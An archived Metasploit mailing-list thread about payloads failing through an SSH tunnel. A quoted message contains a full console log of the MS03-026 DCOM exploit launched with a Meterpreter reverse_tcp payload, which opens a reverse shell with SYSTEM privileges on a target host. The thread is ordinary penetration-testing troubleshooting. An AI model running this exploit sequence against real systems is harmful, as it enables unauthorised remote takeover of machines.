Metasploit mailing list archives

Re: Interactive payloads fail through SSH tunnel


From: Tod Beardsley <todb () packetfu com>
Date: Sun, 24 Feb 2013 10:33:26 -0600

There's a bug to track this, btw. https://dev.metasploit.com/redmine/issues/7760

On Sat, Feb 23, 2013 at 9:03 PM, David Kennedy <kennedyd013 () gmail com> wrote:
Hugs :-)

On Feb 23, 2013 9:53 PM, "Mike Jones!" <property.of.mike.jones () gmail com>
wrote:

Amazing. That did the trick. I love you, David Kennedy.


msf  exploit(ms03_026_dcom) > set RHOST 0.0.0.0
RHOST => 0.0.0.0
msf  exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  0.0.0.0          yes       The target address
   RPORT  135              yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread,
process, none
   LHOST     192.168.12.48    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal


msf  exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on 192.168.12.48:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:0.0.0.0[135] ...
[*] Bound to
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:0.0.0.0[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.13.204
[*] Meterpreter session 3 opened (192.168.12.48:4444 ->
192.168.13.204:4858) at 2013-02-23 18:50:46 -0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: